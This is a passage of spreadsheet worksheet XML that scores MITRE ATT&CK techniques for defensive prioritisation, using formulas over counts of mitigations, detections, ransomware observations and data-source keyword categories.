      <c r="AM179" s="25">
        <f>IF(AL179="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN179" s="52">
        <v>0</v>
      </c>
      <c r="AO179" s="51">
        <v>0</v>
      </c>
      <c r="AP179" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5067619047619044E-2</v>
      </c>
      <c r="AQ179" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15022539682539682</v>
      </c>
      <c r="AR179" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15022539682539682</v>
      </c>
      <c r="AS179" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT179" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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80" spans="1:47" ht="32.1">
      <c r="A180" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9400000000000006E-2</v>
      </c>
      <c r="B180" s="25">
        <f>SUM(H180,M180,V180)*(1+SUM(AE180,AG180,AI180,AK180,AM180))</f>
        <v>0.49400000000000005</v>
      </c>
      <c r="C180" s="25" t="s">
        <v>803</v>
      </c>
      <c r="D180" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E180" s="25" t="s">
        <v>804</v>
      </c>
      <c r="F180" s="51">
        <v>1</v>
      </c>
      <c r="G180" s="51">
        <v>1</v>
      </c>
      <c r="H180" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I180">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J180">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K180">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L180">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M180" s="25">
        <v>0</v>
      </c>
      <c r="N180" s="51">
        <v>3</v>
      </c>
      <c r="O180" s="51">
        <v>4</v>
      </c>
      <c r="P180" s="51">
        <v>0</v>
      </c>
      <c r="Q180" s="51">
        <v>0</v>
      </c>
      <c r="R180" s="52" t="s">
        <v>615</v>
      </c>
      <c r="S180" s="51">
        <v>11</v>
      </c>
      <c r="T180" s="51" t="s">
        <v>616</v>
      </c>
      <c r="U180" s="51">
        <v>14</v>
      </c>
      <c r="V180" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27142857142857146</v>
      </c>
      <c r="W180">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X180">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y180">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z180">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA180">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB180">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC180" s="29" t="s">
        <v>805</v>
      </c>
      <c r="AD180" s="25" t="str" cm="1">
        <f t="array" ref="AD180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE180" s="25">
        <f>IF(AD180="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF180" s="25" t="str" cm="1">
        <f t="array" ref="AF180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG180" s="25">
        <f>IF(AF180="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH180" s="25" t="str" cm="1">
        <f t="array" ref="AH180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC180)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI180" s="25">
        <f>IF(AH180="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ180" s="25" t="str" cm="1">
        <f t="array" ref="AJ180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC180)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK180" s="25">
        <f>IF(AJ180="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL180" s="25" t="str" cm="1">
        <f t="array" ref="AL180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM180" s="25">
        <f>IF(AL180="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN180" s="58">
        <v>0</v>
      </c>
      <c r="AO180" s="51">
        <v>0</v>
      </c>
      <c r="AP180" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9400000000000006E-2</v>
      </c>
      <c r="AQ180" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16466666666666668</v>
      </c>
      <c r="AR180" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16466666666666668</v>
      </c>
      <c r="AS180" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT180" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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81" spans="1:47" ht="48">
      <c r="A181" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2100000000000006E-2</v>
      </c>
      <c r="B181" s="25">
        <f>SUM(H181,M181,V181)*(1+SUM(AE181,AG181,AI181,AK181,AM181))</f>
        <v>0.48766666666666675</v>
      </c>
      <c r="C181" s="25" t="s">
        <v>806</v>
      </c>
      <c r="D181" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E181" s="25" t="s">
        <v>807</v>
      </c>
      <c r="F181" s="51">
        <v>1</v>
      </c>
      <c r="G181" s="51">
        <v>1</v>
      </c>
      <c r="H181" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I181">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J181">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K181">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L181">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M181" s="25">
        <v>0</v>
      </c>
      <c r="N181" s="51">
        <v>0</v>
      </c>
      <c r="O181" s="51">
        <v>8</v>
      </c>
      <c r="P181" s="51">
        <v>4</v>
      </c>
      <c r="Q181" s="51">
        <v>8</v>
      </c>
      <c r="R181" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S181" s="51">
        <v>7</v>
      </c>
      <c r="T181" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U181" s="51">
        <v>11</v>
      </c>
      <c r="V181" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26666666666666666</v>
      </c>
      <c r="W181">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X181">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y181">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z181">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>20</v>
      </c>
      <c r="AA181">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.2</v>
      </c>
      <c r="AB181">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="AC181" s="29" t="s">
        <v>810</v>
      </c>
      <c r="AD181" s="25" t="str" cm="1">
        <f t="array" ref="AD181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC181)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE181" s="25">
        <f>IF(AD181="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF181" s="25" t="str" cm="1">
        <f t="array" ref="AF181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG181" s="25">
        <f>IF(AF181="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH181" s="25" t="str" cm="1">
        <f t="array" ref="AH181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC181)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI181" s="25">
        <f>IF(AH181="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ181" s="25" t="str" cm="1">
        <f t="array" ref="AJ181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK181" s="25">
        <f>IF(AJ181="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL181" s="25" t="str" cm="1">
        <f t="array" ref="AL181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM181" s="25">
        <f>IF(AL181="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN181" s="52">
        <v>1</v>
      </c>
      <c r="AO181" s="51">
        <v>1</v>
      </c>
      <c r="AP181" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2100000000000006E-2</v>
      </c>
      <c r="AQ181" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16255555555555559</v>
      </c>
      <c r="AR181" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16255555555555559</v>
      </c>
      <c r="AS181" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT181" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU18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82" spans="1:47" ht="32.1">
      <c r="A182" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11002285714285714</v>
      </c>
      <c r="B182" s="25">
        <f>SUM(H182,M182,V182)*(1+SUM(AE182,AG182,AI182,AK182,AM182))</f>
        <v>0.43356190476190481</v>
      </c>
      <c r="C182" s="25" t="s">
        <v>811</v>
      </c>
      <c r="D182" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E182" s="25" t="s">
        <v>812</v>
      </c>
      <c r="F182" s="51">
        <v>1</v>
      </c>
      <c r="G182" s="51">
        <v>1</v>
      </c>
      <c r="H182" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I182">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J182">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K182">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L182">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M182" s="25">
        <v>0</v>
      </c>
      <c r="N182" s="51">
        <v>1</v>
      </c>
      <c r="O182" s="51">
        <v>25</v>
      </c>
      <c r="P182" s="51">
        <v>3</v>
      </c>
      <c r="Q182" s="51">
        <v>16</v>
      </c>
      <c r="R182" s="52">
        <v>10.5</v>
      </c>
      <c r="S182" s="51">
        <v>1</v>
      </c>
      <c r="T182" s="52" t="s">
        <v>813</v>
      </c>
      <c r="U182" s="51">
        <v>4</v>
      </c>
      <c r="V182" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26190476190476192</v>
      </c>
      <c r="W182">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>5</v>
      </c>
      <c r="X182">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>9.0909090909090912E-2</v>
      </c>
      <c r="Y182">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>9.0909090909090912E-2</v>
      </c>
      <c r="Z182">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>45</v>
      </c>
      <c r="AA182">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.45</v>
      </c>
      <c r="AB182">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.45</v>
      </c>
      <c r="AC182" s="29" t="s">
        <v>307</v>
      </c>
      <c r="AD182" s="25" t="str" cm="1">
        <f t="array" ref="AD182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC182)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE182" s="25">
        <f>IF(AD182="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF182" s="25" t="str" cm="1">
        <f t="array" ref="AF182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG182" s="25">
        <f>IF(AF182="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH182" s="25" t="str" cm="1">
        <f t="array" ref="AH182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI182" s="25">
        <f>IF(AH182="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ182" s="25" t="str" cm="1">
        <f t="array" ref="AJ182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK182" s="25">
        <f>IF(AJ182="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL182" s="25" t="str" cm="1">
        <f t="array" ref="AL182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM182" s="25">
        <f>IF(AL182="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN182" s="60">
        <v>2</v>
      </c>
      <c r="AO182" s="51">
        <v>1</v>
      </c>
      <c r="AP182" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11002285714285714</v>
      </c>
      <c r="AQ182" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14452063492063494</v>
      </c>
      <c r="AR182" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14452063492063494</v>
      </c>
      <c r="AS182" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT182" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU18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83" spans="1:47" ht="48">
      <c r="A183" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5307619047619046E-2</v>
      </c>
      <c r="B183" s="25">
        <f>SUM(H183,M183,V183)*(1+SUM(AE183,AG183,AI183,AK183,AM183))</f>
        <v>0.35307619047619049</v>
      </c>
      <c r="C183" s="25" t="s">
        <v>814</v>
      </c>
      <c r="D183" s="25" t="s">
        <v>815</v>
      </c>
      <c r="E183" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F183" s="51">
        <v>1</v>
      </c>
      <c r="G183" s="51">
        <v>0</v>
      </c>
      <c r="H183" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I183">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J183">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K183">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L183">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M183" s="25">
        <v>0</v>
      </c>
      <c r="N183" s="51">
        <v>0</v>
      </c>
      <c r="O183" s="51">
        <v>1</v>
      </c>
      <c r="P183" s="51">
        <v>0</v>
      </c>
      <c r="Q183" s="51">
        <v>0</v>
      </c>
      <c r="R183" s="52" t="s">
        <v>816</v>
      </c>
      <c r="S183" s="51">
        <v>11</v>
      </c>
      <c r="T183" s="52" t="s">
        <v>817</v>
      </c>
      <c r="U183" s="51">
        <v>16</v>
      </c>
      <c r="V183" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26190476190476192</v>
      </c>
      <c r="W183">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>27</v>
      </c>
      <c r="X183">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Y183">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Z183">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA183">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB183">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC183" s="29" t="s">
        <v>496</v>
      </c>
      <c r="AD183" s="25" t="str" cm="1">
        <f t="array" ref="AD183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE183" s="25">
        <f>IF(AD183="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF183" s="25" t="str" cm="1">
        <f t="array" ref="AF183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC183)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG183" s="25">
        <f>IF(AF183="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH183" s="25" t="str" cm="1">
        <f t="array" ref="AH183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC183)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI183" s="25">
        <f>IF(AH183="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ183" s="25" t="str" cm="1">
        <f t="array" ref="AJ183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK183" s="25">
        <f>IF(AJ183="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL183" s="25" t="str" cm="1">
        <f t="array" ref="AL183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC183)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM183" s="25">
        <f>IF(AL183="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN183" s="52">
        <v>0</v>
      </c>
      <c r="AO183" s="51">
        <v>0</v>
      </c>
      <c r="AP183" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5307619047619046E-2</v>
      </c>
      <c r="AQ183" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1176920634920635</v>
      </c>
      <c r="AR183" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1176920634920635</v>
      </c>
      <c r="AS183" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT183" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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84" spans="1:47" ht="48">
      <c r="A184" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2785714285714295E-2</v>
      </c>
      <c r="B184" s="25">
        <f>SUM(H184,M184,V184)*(1+SUM(AE184,AG184,AI184,AK184,AM184))</f>
        <v>0.42785714285714294</v>
      </c>
      <c r="C184" s="25" t="s">
        <v>818</v>
      </c>
      <c r="D184" s="25" t="s">
        <v>381</v>
      </c>
      <c r="E184" s="25" t="s">
        <v>819</v>
      </c>
      <c r="F184" s="51">
        <v>1</v>
      </c>
      <c r="G184" s="51">
        <v>1</v>
      </c>
